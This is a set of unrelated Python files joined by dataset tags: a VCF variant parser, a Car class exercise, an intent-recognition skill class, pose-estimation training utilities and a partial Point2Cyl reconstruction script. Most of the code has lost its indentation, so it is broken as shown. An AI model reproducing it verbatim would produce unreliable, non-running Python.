vcf_line_dict['INFO'] = self.parse_info_field(vcf_line_dict['INFO'])
return vcf_line_dict.copy()
def lines_2_dicts(self, chunk):
vcf_line_dict = self.empty_vcf_line.copy()
return [self.parse_vcf_line(line, vcf_line_dict) for line in chunk]
def get_chromosome_lengths(self, regions_to_skip=[]):
try:
tbx = pysam.Tabixfile(self.input) # TODO: create try statement to test that file is actually a VCF
except:
print 'Input not Tabix Indexed.'
sys.exit()
# PARSE LENGTH INFO FROM HEADER
chrm_lengths = []
chrm_lengths_dict = {}
for line in tbx.header:
if line.startswith("##contig="):
chrm_name = re.findall(r'ID=.*,', line)
chrm_name = chrm_name[0].strip('ID=').strip(',')
chrm_length = re.findall(r'length=.*>', line)
chrm_length = int(chrm_length[0].strip('length=').strip('>'))
if chrm_name in regions_to_skip:
print 'skipping', chrm_name
continue
chrm_lengths.append((chrm_name, 1, chrm_length))
chrm_lengths_dict[chrm_name] = chrm_length
chrm_lengths = tuple(chrm_lengths)
tbx.close()
return chrm_lengths_dict
def get_slice_indicies(self):
"""Get slice information from VCF file that is tabix indexed (bgzipped). """
# GENERATE SLICES:
# Does not yield final partial slice. Not a bug!
#print [c for c in self.chrms_2_sizes.iteritems()]
if self.region == [None]:
# ITERATE OVER CHROMOSOMES (USE ORDERED DICT TO KEEP IN VCF ORDER)
for chrm, length in self.chrms_2_sizes.iteritems():
cStart = 0
cStop = 0
iCount = 0
while cStop < length:
if iCount == 0:
cStart = 1
cStop = self.window_size
iCount += 1
yield (chrm, cStart, cStop)
cStart += self.step
cStop += self.step
else:
chrm, start, stop = self.region
cStart = 0
cStop = 0
iCount = 0
if self.window_size == None:
self.window_size = stop - start
if self.step == None:
self.step = 0
while cStop < stop:
if iCount == 0:
cStart = start
cStop = start + self.window_size - 1
iCount += 1
yield (chrm, cStart, cStop)
if self.step == 0:
cStart += self.window_size
else:
cStart += self.step
cStop = cStart + self.window_size + self.step - 1
def snp_chunks_interator(self, num_snv_per_chunk=3, fillvalue=None):
def grouper(iterable, n):
"""Yields chunks of SNV of n number of SNVs.
Properly handles chromsome so that
chunks don't overlap chromosomes."""
chrom = None
chunk = []
for count, i in enumerate(iterable):
#s = i.split("\t")[:3]
current_chrom = i["CHROM"]
if count == 0:
chrom = current_chrom
if current_chrom != chrom:
yield chunk
chunk = [i]
chrom = current_chrom
continue
if current_chrom == chrom:
chunk.append(i)
if len(chunk) >= n:
yield chunk
chunk = []
chrom = current_chrom
chunk_iterator = grouper(self.vcf_file_iterator(), n=num_snv_per_chunk)
for c, i in enumerate(chunk_iterator):
if len(i) == 0: # handles edge case
continue
if len(i) != num_snv_per_chunk:
padding = num_snv_per_chunk - len(i)
i.extend([fillvalue]*padding)
yield i
def calc_allele_counts(self, vcf_line_dict, sample_ids=None):
#allele_counts = defaultdict({0:0.0,1:0.0,2:0.0,3:0.0,4:0.0})
allele_counts = dict((key, {0: 0.0, 1: 0.0, 2: 0.0, 3: 0.0}) for key in self.populations.keys())
for population in self.populations.keys():
for sample_id in self.populations[population]:
if vcf_line_dict[sample_id] != None:
genotype = vcf_line_dict[sample_id]
genotype = genotype["GT"].split("/") # TODO add phased logic
if genotype == [".", "."]:
continue
genotype = [int(item) for item in genotype]
for allele in genotype:
allele_counts[population][allele] += 1.0
return allele_counts
def calc_heterozygosity(self, vcf_line_dict, sample_ids=None):
heterozygosity = dict((key, 0) for key in self.populations.keys())
for population in self.populations.keys():
het_count = 0.0
total_samples = 0.0
for sample_id in self.populations[population]:
if vcf_line_dict[sample_id] != None:
genotype = vcf_line_dict[sample_id]
genotype = genotype["GT"].split("/") # TODO add phased logic
if genotype == [".", "."]:
continue
genotype = map(int, genotype)
if genotype[0] != genotype[1]:
het_count += 1
total_samples +=1
try:
heterozygosity[population] = het_count / total_samples
except:
heterozygosity[population] = 0.0
return heterozygosity
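# ----------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). The file path,
# sample names and population labels below are placeholders; the input is
# expected to be a VCF whose header contains ##contig lines.
#
# populations = {'popA': ['sample1', 'sample2'], 'popB': ['sample3', 'sample4']}
# vcf = VCF('variants.vcf.gz', populations=populations, region=[None], window_size=1000)
# for vcf_line in vcf.vcf_file_iterator():
#     print vcf.calc_allele_counts(vcf_line)
# ----------------------------------------------------------------------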
|
nilq/baby-python
|
python
|
"""
Create a Car class. Attributes: brand, model, year of manufacture, speed (0 by default).
Methods: increase the speed (speed +5), decrease the speed (speed -5),
stop (reset the speed to 0), show the current speed, reverse (flip the sign of the speed).
"""
class Car:
    def __init__(self, brand, model, year, speed=0):
        # attributes (properties)
self.brand = brand
self.model = model
self.year = year
self.speed = speed
    # methods
def increase_speed(self):
self.speed += 5
def reduce_speed(self):
self.speed -= 5
def stop(self):
self.speed = 0
def current_speed(self):
print(f"Your speed: {self.speed} km/h")
def reverse(self):
self.speed *= -1
if __name__ == "__main__":
my_car = Car("Toyota", "Camry", 2017, 0)
my_car.increase_speed()
my_car.reduce_speed()
my_car.stop()
my_car.current_speed()
my_car.reverse()
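    # Illustrative extra run (not part of the original task): build up some
    # speed, then reverse and show the sign flip.
    my_car.increase_speed()
    my_car.increase_speed()
    my_car.reverse()
    my_car.current_speed()  # expected output: "Your speed: -10 km/h"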
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import importlib
import itertools
from string import Formatter
from adapt.intent import IntentBuilder
from adapt.engine import DomainIntentDeterminationEngine
from padatious import IntentContainer
from padatious.util import expand_parentheses
class EntitiesDict(dict):
def __missing__(self, key):
return '{' + key + '}'
class Skill(object):
def __init__(self, root_dir, name, nlp, active):
self._root_dir = root_dir
self._name = name
self._nlp = nlp
self._active = active
self._intents_container = None
self._adapt_intent_engine = None
self.initialize_intent_parser()
def is_active(self):
return self._active
def get_name(self):
return self._name
def initialize_intent_parser(self):
self._intents_container = IntentContainer("%s_cache" % self._name)
self._adapt_intent_engine = DomainIntentDeterminationEngine()
self._adapt_intent_engine.register_domain(self._name)
for intent_name, intent_file_path in self.get_intent_names():
#print ("###### IntentBuilder: %s, %s" % (intent_name, intent_file_path))
adapt_intent_builder = IntentBuilder(intent_name)
for intent_name, intent_example_sentences_array in self.intent_training_file_content(intent_file_path, 'intent'):
#print ("add intent %s, %s" % (intent_name, intent_example_sentences_array))
self._intents_container.add_intent(intent_name, intent_example_sentences_array)
for entity_name, entities_array in self.intent_training_file_content(intent_file_path, 'entities'):
#print ("add entity %s, %s " % (entity_name, entities_array))
self._intents_container.add_entity(entity_name, entities_array)
# adapt
if entity_name.endswith("_keyword"):
for k in entities_array:
#print ("add keyword %s to %s" % (k, intent_name))
self._adapt_intent_engine.register_entity(k, entity_name, domain=self._name)
adapt_intent_builder.require(entity_name)
adapt_intent=adapt_intent_builder.build()
self._adapt_intent_engine.register_intent_parser(adapt_intent, domain=self._name)
self._intents_container.train(debug=False)
def get_intent_file_content(self, skill_file_path):
content_array = []
with open(skill_file_path, 'r', encoding='utf-8') as skill_file:
for entry in skill_file:
content_array.append(entry)
return content_array
def get_entities_file_content(self, skill_file_path, allow_variations):
content_array = []
with open(skill_file_path, 'r', encoding='utf-8') as skill_file:
for entry in skill_file:
entries, variations=entry.strip().split('|'),[]
content_array.append(entries[0])
if allow_variations:
if len(entries) > 1:
content_array.extend(entries[1].split(','))
return content_array
def get_intent_names(self):
intent_root_file_path=os.path.join(self._root_dir, self._name, 'intents')
for intent_name in os.listdir(intent_root_file_path):
intent_file_path=os.path.join(intent_root_file_path, intent_name)
yield intent_name, intent_file_path
def intent_training_file_content(self, artefacts_root_dir, artefact_file_extension, allow_variations=True):
for artefact_file_path in os.listdir(artefacts_root_dir):
if artefact_file_path.endswith('.' + artefact_file_extension):
artefact_name = artefact_file_path.replace('.' + artefact_file_extension, '')
                if artefact_file_extension == 'entities':
artefact_file_lines = self.get_entities_file_content(os.path.join(artefacts_root_dir, artefact_file_path), allow_variations)
                elif artefact_file_extension == 'intent':
artefact_file_lines = self.get_intent_file_content(os.path.join(artefacts_root_dir, artefact_file_path))
yield artefact_name, artefact_file_lines
def expand_intents(self, include_additional_entities=False):
# load entities first in the file and build a dictionary
result = dict()
entities_dict = dict()
for intent_name, intent_file_path in self.get_intent_names():
for entity_type, entities_array in self.intent_training_file_content(intent_file_path, 'entities', False):
entities_dict[entity_type]=entities_array
# load intents again from file
for intent_type, intent_array in self.intent_training_file_content(intent_file_path, 'intent'):
intent_sentences = set()
for line in intent_array:
line_tokens = self._nlp.tokenization.tokenize(line)
expanded = expand_parentheses(line_tokens)
for sentence_tokens in expanded:
sentence = self._nlp.tokenization.detokenize(sentence_tokens)
fieldnames = [fname for _, fname, _, _ in Formatter().parse(sentence) if fname]
fields_dict = dict()
for fieldname in fieldnames:
if fieldname in entities_dict:
fields_dict[fieldname]=entities_dict[fieldname].copy()
else:
if include_additional_entities:
field_values = self.get_additional_entities(fieldname)
if len(field_values) > 0:
fields_dict[fieldname]=field_values
if len(fields_dict) > 0:
keys, values = zip(*fields_dict.items())
permutations = [dict(zip(keys, v)) for v in itertools.product(*values)]
for p in permutations:
entities_dict_permutation = EntitiesDict(p)
intent_sentences.add(sentence.format(**entities_dict_permutation))
else:
intent_sentences.add(sentence)
result[intent_type] = list(intent_sentences)
return result
def get_additional_entities(self, fieldname):
return []
def calculate_intent(self, text):
text = self._nlp.preprocess(text)
# example result
# {'intent_type': 'beth.fydd.y.tywydd', 'confidence': 1.0, 'target': None, 'keyword': 'tywydd'}
#
#print ("evaluating: %s with adapt:" % text)
adapt_best_confidence=0.0
adapt_result = self._adapt_intent_engine.determine_intent(text)
for a in adapt_result:
# print (a)
if a["confidence"] > adapt_best_confidence:
adapt_best_confidence=a["confidence"]
# example result
# {'sent': "beth yw ' r tywydd", 'name': 'beth.ywr.tywydd', 'conf': 1.0, 'matches': {'tywydd_keyword': 'tywydd?'}}
#
#print ("evaluating: %s with padatious:" % text)
padatious_result = self._intents_container.calc_intent(text)
return adapt_best_confidence, padatious_result
def handle(self, intent, latitude, longitude):
pass
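# Illustrative usage sketch (comments only, not part of the original module).
# It assumes an `nlp` object exposing `preprocess`, `tokenization.tokenize`
# and `tokenization.detokenize`, and a skill directory containing an
# `intents/` folder with *.intent and *.entities training files.
#
# skill = Skill('/path/to/skills', 'weather', nlp, active=True)
# adapt_confidence, padatious_intent = skill.calculate_intent('what is the weather')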
|
nilq/baby-python
|
python
|
"""
This is companion code to Project 4 for CSEP576au21
(https://courses.cs.washington.edu/courses/csep576/21au/)
Instructor: Vitaly Ablavsky
"""
# ======================================================================
# Copyright 2021 Vitaly Ablavsky https://corvidim.net/ablavsky/
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ======================================================================
from pdb import set_trace as keyboard
import torch
import numpy as np
import perf_eval.metrics
import time
#########################################################################
# get_timestamp()
#########################################################################
def get_timestamp():
t = time.localtime()
return '{0}-{1:02}-{2:02}_{3:02}-{4:02}-{5:02}'.format(t.tm_year,t.tm_mon,t.tm_mday,t.tm_hour,t.tm_min,t.tm_sec)
#########################################################################
# compute_and_viz_angular_error_metrics
#########################################################################
def compute_and_viz_angular_error_metrics(y_gt, y_est, par):
if par['mode'] == 'train_and_test_2_out':
y_gt = np.apply_along_axis(lambda x: np.arctan2(x[0], x[1]), 0, y_gt)
y_est = np.apply_along_axis(lambda x: np.arctan2(x[0], x[1]), 0, y_est)
o_err = perf_eval.metrics.angular_diff_1m_cos(y_gt, y_est)
h_counts, h_bins_e = perf_eval.metrics.viz_histogram(o_err, par)
return (h_counts, h_bins_e)
def plotLossEpochs(train_test_losses, train_test_errors, epoch_numbers, figure_file_name="MetricEpochCurve"):
#print(train_test_losses, train_test_errors, epoch_numbers)
import pandas as pd
train_loss = list(train_test_losses[0])
test_loss = list(train_test_losses[1])
train_errors = list(train_test_errors[0])
test_errors = list(train_test_errors[1])
dset = [[epoch_numbers, train_loss[i], test_loss[i]] for i in range(len(train_loss))]
df = pd.DataFrame(dset, columns=["Epochs", "Train Loss", "Test Loss"])
fig = df.plot(x="Epochs").get_figure()
#fig.show()
fig.savefig(f"{figure_file_name}_Losses.png", format="png")
# Errors
dset = [[epoch_numbers, train_errors[i], test_errors[i]] for i in range(len(train_errors))]
df = pd.DataFrame(dset, columns=["Epochs", "Train Error (RMSE)", "Test Error (RMSE)"])
fig = df.plot(x="Epochs").get_figure()
#fig.show()
fig.savefig(f"{figure_file_name}_Errors.png", format="png")
#########################################################################
# diff_1m_cos_loss
#########################################################################
class diff_1m_cos_loss(object):
def __init__(self, reduction=None):
self.reduction = reduction
def __call__(self, y_est, y_gt):
o_diff = 0.5 * (1 - torch.cos(y_est - y_gt))
loss = torch.sum(o_diff)
return loss
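# Quick sanity check for diff_1m_cos_loss (illustrative, not part of the
# original file): the per-sample loss is 0 for identical angles and 1 for
# angles that differ by pi.
# >>> loss_fn = diff_1m_cos_loss()
# >>> loss_fn(torch.tensor([0.0]), torch.tensor([float(np.pi)]))
# tensor(1.)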
#########################################################################
# y_within_range
#########################################################################
def y_within_range(y, o_range):
mask_h = torch.lt(y, o_range[1])
mask_l = torch.gt(y, o_range[0])
mask = torch.logical_and(mask_h, mask_l)
return mask
#########################################################################
# Xform_select_in_y_range
#########################################################################
class Xform_select_in_y_range(torch.nn.Module):
"""
This class can be extended to be used with torchvision.transforms
    However, its use in a data loader is slightly complicated by the fact that
    the transform is applied to both the labels and the image, so in Dataset.__getitem__
    we would need to handle both 'transform' and 'transform_label'.
"""
def __init__(self, omega_range):
super().__init__()
self.omega_range = omega_range
def forward(self, y_gt, y_est, x=None):
y_mask = y_within_range(y_gt, self.omega_range)
y_est_m = None
x_m = None
if x is not None:
x_m = torch.index_select(x,0, torch.where(y_mask)[0])
if len(y_gt.shape) == 1:
y_gt_m = torch.masked_select(y_gt,y_mask)
else:
y_gt_m = torch.index_select(y_gt, 0, torch.where(y_mask)[0])
if y_est is not None:
# :TOREVIEW: can be simplified?
if len(y_est.shape) == 1: # regression for 1D pose
y_est_m = torch.masked_select(y_est,y_mask)
else: # shape-> (batch_dim, n_class)
y_est_m = torch.index_select(y_est, 0, torch.where(y_mask)[0])
return (y_gt_m, y_est_m, x_m)
def __repr__(self):
return self.__class__.__name__ + '(omega_range = {})'.format(self.omega_range)
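# Illustrative use of Xform_select_in_y_range (not part of the original file):
# keep only the samples whose ground-truth angle lies inside (0, pi/2); the
# inputs y_gt, y_est and x are assumed to be tensors with a matching batch dim.
# >>> xform = Xform_select_in_y_range((0.0, float(np.pi) / 2))
# >>> y_gt_m, y_est_m, x_m = xform(y_gt, y_est, x)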
#########################################################################
# perform_testing()
#########################################################################
def perform_testing(par, model, loss_func, device, loader, name):
"""
    This function can be used inside the training loop to monitor progress
"""
if not(par['instructor_version']) and loss_func is None:
print('perform_testing() returning early (since loss_func is None)')
return (0,*3*(None,))
omega_mask = Xform_select_in_y_range(par['omega_range'])
model.eval()
epoch_loss = 0
correct = 0
y_est_all = []
y_gt_all = []
with torch.no_grad():
n_samples = 0
for batch_idx, batch_data in enumerate(loader):
inst_id = batch_data['instance_id']
img = batch_data['image']
omega = batch_data['omega']
x = img
if not hasattr(model,'conv_feats'): # model is an MLP
x = x.flatten(1)
if par['mode'] == 'train_and_test_2_out':
y_omega_gt = torch.cat((torch.cos(omega), torch.sin(omega)), 1)
else:
y_omega_gt = omega
x = x.to(device)
y_omega_gt = y_omega_gt.to(device)
if par['regression_problem']:
y_gt = y_omega_gt
else: # testing for pose-class classification
y_gt = pose1D_to_pose_class_v2(y_omega_gt, par['class_proto'])
y_est = model(x)
if par['mode'] == 'train_and_test_2_out':
loss = loss_func(y_est, y_gt)
n_samples += y_gt.detach().numpy().shape[0]
else:
y_gt_m, y_est_m, x_m = omega_mask(y_gt, y_est, x)
n_samples += y_gt_m.shape[0]
loss = loss_func(y_est_m, y_gt_m)
if False:
if par['regression_problem']:
loss = loss_func(y_est_m, y_omega_gt_m)
else: # testing for pose-class classification
loss = loss_func(y_est_m, y_class_gt)
epoch_loss += loss.detach().item()
if not par['regression_problem']: # i.e., classification
y_est_m = y_est_m.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += y_est_m.eq(y_gt_m.view_as(y_est_m)).sum().item()
if par['mode'] == 'train_and_test_2_out':
y_gt_all.append(y_gt)
y_est_all.append(y_est)
pass
else:
for t_ in [(y_gt_all, y_gt_m), (y_est_all, y_est_m)]:
#t_[0].append(t_[1].cpu().detach().numpy())
t_[0].append(t_[1])
epoch_loss /= n_samples
acc = correct / n_samples
verbose = False # par['verbose_perform_testing']
if verbose:
print('{}: Average loss: {:.4f}'.format(
name, epoch_loss))
y_est_all = torch.cat(y_est_all)
if par['mode'] == 'train_and_test_2_out':
y_gt_all = torch.cat(y_gt_all)
else:
y_gt_all = torch.cat(y_gt_all).reshape(-1,1) # column vector
rmse_error = perf_eval.metrics.rmserror(y_est_all, y_gt_all, par['mode'])
return (epoch_loss, acc, y_est_all, y_gt_all, rmse_error)
|
nilq/baby-python
|
python
|
# Mikaela Uy (mikacuy@cs.stanford.edu)
import argparse
import os
import sys
import torch
import torch.nn as nn
import torch.nn.functional as F
import datetime
import time
import sys
import importlib
import shutil
import numpy as np
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR) # model
sys.path.append(os.path.join(BASE_DIR, '..','data_preprocessing'))
sys.path.append(os.path.join(BASE_DIR, 'models'))
## For implicit
sys.path.append(os.path.join(BASE_DIR, 'IGR'))
from sampler import *
from network import *
from general import *
from plots import plot_surface_2d
from chamferdist import ChamferDistance
chamferDist = ChamferDistance()
from global_variables import *
from utils import *
from data_utils import *
from dataloader import AutodeskDataset_h5_sketches
from losses import *
from sklearn.neighbors import NearestNeighbors
from sklearn.neighbors import KDTree
import pickle
import trimesh
### For extent clustering
from sklearn.cluster import DBSCAN
from sklearn import metrics
from plyfile import PlyData, PlyElement
MAX_NUM_INSTANCES = 8
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='data/')
# parser.add_argument('--model_id', type=str, default='115629_40d61053_0000_1')
# parser.add_argument('--model_id', type=str, default='126491_c931419a_0003_1')
# parser.add_argument('--model_id', type=str, default='111773_ab926952_0000_1')
parser.add_argument('--model_id', type=str, default='55838_a1513314_0000_1')
parser.add_argument('--data_split', type=str, default='test')
parser.add_argument('--out_fname', type=str, default='test_sdf.ply')
parser.add_argument('--dump_dir', default= "dump_visu/", type=str)
parser.add_argument('--num_points', type=int, default=2048)
### For marching cubes
parser.add_argument('--resolution', type=int, default=512)
parser.add_argument('--range', type=float, default=1.5)
parser.add_argument('--level', type=float, default=0.0)
### Load network
parser.add_argument('--model', type=str, default='pointnet_extrusion', help='model name')
parser.add_argument("--logdir", default="./results/Point2Cyl/", help="path to the log directory", type=str)
parser.add_argument("--ckpt", default="model.pth", help="checkpoint", type=str)
parser.add_argument('--K', type=int, default=8, help='Max number of extrusions')
parser.add_argument('--num_sk_point', type=int, default=1024, help='Point Number [default: 2048]')
parser.add_argument('--pred_seg', action='store_false')
parser.add_argument('--pred_normal', action='store_false')
parser.add_argument('--pred_bb', action='store_false')
parser.add_argument('--pred_extrusion', action='store_false')
parser.add_argument('--pred_op', action='store_true')
parser.add_argument('--norm_eig', action='store_true')
parser.add_argument('--use_whole_pc', action='store_true')
parser.add_argument('--use_extrusion_axis_feat', action='store_true')
##Pre-trained implicit network
### Sparse
parser.add_argument("--im_logdir", default="./results/IGR_sparse/", help="path to the log directory", type=str)
### Dense
# parser.add_argument("--im_logdir", default="./results/IGR_dense/", help="path to the log directory", type=str)
parser.add_argument("--im_ckpt", default="latest.pth", help="checkpoint", type=str)
##########
parser.add_argument('--use_gt_3d', action='store_true')
parser.add_argument('--with_direct_opt', action='store_true')
parser.add_argument('--separate', action='store_true')
parser.add_argument('--use_pretrained_2d', action='store_true')
### For post processing
parser.add_argument('--seg_post_process', action='store_true')
parser.add_argument('--scale_post_process', action='store_true')
parser.add_argument('--extent_post_process', action='store_true')
parser.add_argument('--igr_post_process', action='store_true')
parser.add_argument('--igr_post_process_reinit', action='store_true')
#### Automation based on order and operation
parser.add_argument('--design_option', type=int, default=1, help='Design option modes')
### Output folder to copy
parser.add_argument('--output_dir', default= "output_visu/", type=str)
# torch.manual_seed(10) ## bad
torch.manual_seed(1234)
# torch.manual_seed(0) ## good
np.random.seed(0)
FLAGS = parser.parse_args()
DESIGN_OPTION = FLAGS.design_option
if DESIGN_OPTION == 1:
ops = np.array([1, 1, 1, 1, 1, 1, 1, 1])
perm = np.array([0, 1, 2, 3, 4, 5, 6, 7])
elif DESIGN_OPTION == 2:
ops = np.array([-1, 1, 1])
perm = np.array([1, 0, 2])
elif DESIGN_OPTION == 3:
ops = np.array([-1, -1, 1, 1])
perm = np.array([2, 1, 0, 3])
elif DESIGN_OPTION == 4:
ops = np.array([1, -1, 1])
perm = np.array([0, 1, 2])
elif DESIGN_OPTION == 5:
ops = np.array([1, 1, -1])
perm = np.array([0,1,2])
DATA_SPLIT = FLAGS.data_split
DATA_DIR = FLAGS.data_dir
MODEL_ID = FLAGS.model_id
NUM_POINTS = FLAGS.num_points
OUT_FNAME = FLAGS.out_fname
DUMP_DIR = FLAGS.dump_dir
if not os.path.exists(DUMP_DIR): os.mkdir(DUMP_DIR)
temp_fol = os.path.join(DUMP_DIR, "tmp")
if not os.path.exists(temp_fol): os.mkdir(temp_fol)
plot_fol = os.path.join(DUMP_DIR, "plot")
if not os.path.exists(plot_fol): os.mkdir(plot_fol)
OUTPUT_DIR = FLAGS.output_dir
if not os.path.exists(OUTPUT_DIR): os.mkdir(OUTPUT_DIR)
recons_fol = os.path.join(OUTPUT_DIR, "reconstruction")
if not os.path.exists(recons_fol): os.mkdir(recons_fol)
pc_input_fol = os.path.join(OUTPUT_DIR, "input_point_clouds")
if not os.path.exists(pc_input_fol): os.mkdir(pc_input_fol)
intermediate_fol = os.path.join(OUTPUT_DIR, "intermediate_volumes")
if not os.path.exists(intermediate_fol): os.mkdir(intermediate_fol)
#### Visu for debugging
filename = "render.sh"
f = open(os.path.join(DUMP_DIR, filename), "w")
## To store the output image files
filename = "image_files.sh"
g = open(os.path.join(DUMP_DIR, filename), "w")
os.makedirs(os.path.join(DUMP_DIR, "point_cloud"), exist_ok=True)
os.makedirs(os.path.join(DUMP_DIR, "tmp"), exist_ok=True)
os.makedirs(os.path.join(DUMP_DIR, "rendering_point_cloud"), exist_ok=True)
#######
### Marching cubes
RES = FLAGS.resolution
RANGE = FLAGS.range
LEVEL = FLAGS.level
### Network
MODEL = FLAGS.model
LOG_DIR = FLAGS.logdir
CKPT = FLAGS.ckpt
K = FLAGS.K
NUM_SK_POINT = FLAGS.num_sk_point
PRED_SEG = FLAGS.pred_seg
PRED_NORMAL = FLAGS.pred_normal
PRED_EXT = FLAGS.pred_extrusion
PRED_BB = FLAGS.pred_bb
PRED_OP = FLAGS.pred_op
NORM_EIG = FLAGS.norm_eig
USE_WHOLE_PC = FLAGS.use_whole_pc
USE_EXTRUSION_AXIS_FEAT = FLAGS.use_extrusion_axis_feat
IM_LOGDIR = FLAGS.im_logdir
IM_CKPT = FLAGS.im_ckpt
USE_GT_3D = FLAGS.use_gt_3d
DIRECT_OPT = FLAGS.with_direct_opt
SEPARATE = FLAGS.separate
USE_PRETRAINED_2D = FLAGS.use_pretrained_2d
### For postprocess
SEG_PP = FLAGS.seg_post_process
SCALE_PP = FLAGS.scale_post_process
EXTENT_PP = FLAGS.extent_post_process
IGR_PP = FLAGS.igr_post_process
IGR_PP_INIT = FLAGS.igr_post_process_reinit
#######
### Load the geometry
# Individual model files
h5_file = os.path.join(DATA_DIR+DATA_SPLIT, "h5", str(MODEL_ID)+'.h5')
point_cloud, normals, extrusion_labels, extrusion_axes, extrusion_distances,\
n_instances, vertices, faces, face_normals, face_to_ids, norm_factor, operation = get_model(h5_file, mesh_info=True, operation=True)
### For current sample
curr_pc = point_cloud
# curr_pc = curr_pc.astype(float)
curr_n_instances = n_instances[0]
print("Number of extrusion instances: "+str(curr_n_instances))
### Downsample depending on number of points ##
idx = np.arange(curr_pc.shape[0])
np.random.shuffle(idx)
curr_pc = curr_pc[idx[:NUM_POINTS]]
#### Save input point cloud too
#### Output the input depth point cloud
verts_tuple = np.zeros((NUM_POINTS,), dtype=[("x", "f4"), ("y", "f4"), ("z", "f4")])
for j in range(0, NUM_POINTS):
verts_tuple[j] = tuple(curr_pc[j, :])
el_verts = PlyElement.describe(verts_tuple, "vertex")
print(verts_tuple)
ply_filename_out = os.path.join(pc_input_fol, MODEL_ID+"_input.ply")
PlyData([el_verts], text=True).write(ply_filename_out)
#######
### Initialize and load network
device = torch.device('cuda')
MODEL_IMPORTED = importlib.import_module(MODEL)
pred_sizes = []
if PRED_NORMAL:
pred_sizes.append(3)
else:
pred_sizes.append(1) ##dummy DO NOT USE in prediction
if PRED_SEG and PRED_BB:
# 2K classes instead of K
pred_sizes.append(2*K)
elif PRED_SEG:
pred_sizes.append(K)
else:
pred_sizes.append(1) ##dummy DO NOT USE in prediction
model = MODEL_IMPORTED.backbone(output_sizes=pred_sizes)
GLOBAL_SIGMA = 1.8
LOCAL_SIGMA = 0.01
D_IN = 2
LATENT_SIZE = 256
sampler = NormalPerPoint(GLOBAL_SIGMA, LOCAL_SIGMA)
## Implicit
implicit_net = ImplicitNet(d_in=D_IN+LATENT_SIZE, dims = [ 512, 512, 512, 512, 512, 512, 512, 512 ], skip_in = [4], geometric_init= True, radius_init = 1, beta=100)
## PointNet
if not USE_WHOLE_PC:
pn_encoder = PointNetEncoder(LATENT_SIZE, D_IN, with_normals=True)
else:
if USE_EXTRUSION_AXIS_FEAT:
pn_encoder = PointNetEncoder(LATENT_SIZE, 7, with_normals=False) ## 3d pc plus confidence mask, plus extrusion axis
else:
        pn_encoder = PointNetEncoder(LATENT_SIZE, 4, with_normals=False) ## 3d pc plus confidence mask
fname = os.path.join(LOG_DIR, CKPT)
model.load_state_dict(torch.load(fname)["model"])
implicit_net.load_state_dict(torch.load(fname)["implicit_net"])
pn_encoder.load_state_dict(torch.load(fname)["pn_encoder"])
model.to(device)
implicit_net.to(device)
pn_encoder.to(device)
model.eval()
implicit_net.eval()
pn_encoder.eval()
print("Model loaded.")
## Loaded pre-trained sketch only encoder
IM_LOGDIR = FLAGS.im_logdir
IM_CKPT = FLAGS.im_ckpt
if USE_PRETRAINED_2D:
loaded_pn_encoder = PointNetEncoder(LATENT_SIZE, D_IN, with_normals=True)
loaded_pn_encoder.to(device)
fname = os.path.join(IM_LOGDIR, IM_CKPT)
implicit_net.load_state_dict(torch.load(fname)["model_state_dict"])
loaded_pn_encoder.load_state_dict(torch.load(fname)["encoder_state_dict"])
print("Pre-trained fixed implicit model loaded.")
loaded_pn_encoder.eval()
print()
##########
start_time = time.time()
#### Extrusion parameters
if USE_GT_3D:
print("Non-implemented for this type of loading...")
exit()
else:
with torch.no_grad():
gt_extrusion_labels = torch.from_numpy(extrusion_labels[idx[:NUM_POINTS]]).unsqueeze(0).to(device)
NUM_POINT = curr_pc.shape[0]
### Use network
curr_pc = torch.from_numpy(curr_pc).unsqueeze(0).to(device).to(torch.float)
# X, W_raw, O, _, _ = model(curr_pc)
X, W_raw = model(curr_pc)
X = F.normalize(X, p=2, dim=2, eps=1e-12)
W_2K = torch.softmax(W_raw, dim=2)
## 2K classes were predicted, create segmentation pred
# Barrel
W_barrel = W_2K[:, :, ::2]
# Base
W_base = W_2K[:, :, 1::2]
W = W_barrel + W_base
# Base or barrel segmentation
'''
0 for barrel
1 for base
'''
BB = torch.zeros(1, NUM_POINT, 2).to(device)
for j in range(K):
BB[:,:,0] += W_2K[:, :, j*2]
BB[:,:,1] += W_2K[:, :, j*2+1]
W_ = hard_W_encoding(W, to_null_mask=True)
matching_indices, mask = hungarian_matching(W_, gt_extrusion_labels, with_mask=True)
mask = mask.float()
## For visualization
W_reordered_unmasked = torch.gather(W_, 2, matching_indices.unsqueeze(1).expand(1, NUM_POINT, K)) # BxNxK
W_reordered = torch.where((mask).unsqueeze(1).expand(1, NUM_POINT, K)==1, W_reordered_unmasked, torch.ones_like(W_reordered_unmasked)* -1.)
## Get original W probabilities
W_soft_reordered_unmasked = torch.gather(W, 2, matching_indices.unsqueeze(1).expand(1, NUM_POINT, K)) # BxNxK
W_soft_reordered = torch.where((mask).unsqueeze(1).expand(1, NUM_POINT, K)==1, W_soft_reordered_unmasked, torch.ones_like(W_soft_reordered_unmasked)* -1.)
label = torch.argmax(W_reordered, dim=-1)
pred_bb_label = torch.argmax(BB, dim=-1)
EA_X = X
EA_W = W_reordered
W_barrel_reordered = torch.gather(W_barrel, 2, matching_indices.unsqueeze(1).expand(1, NUM_POINT, K)) # BxNxK
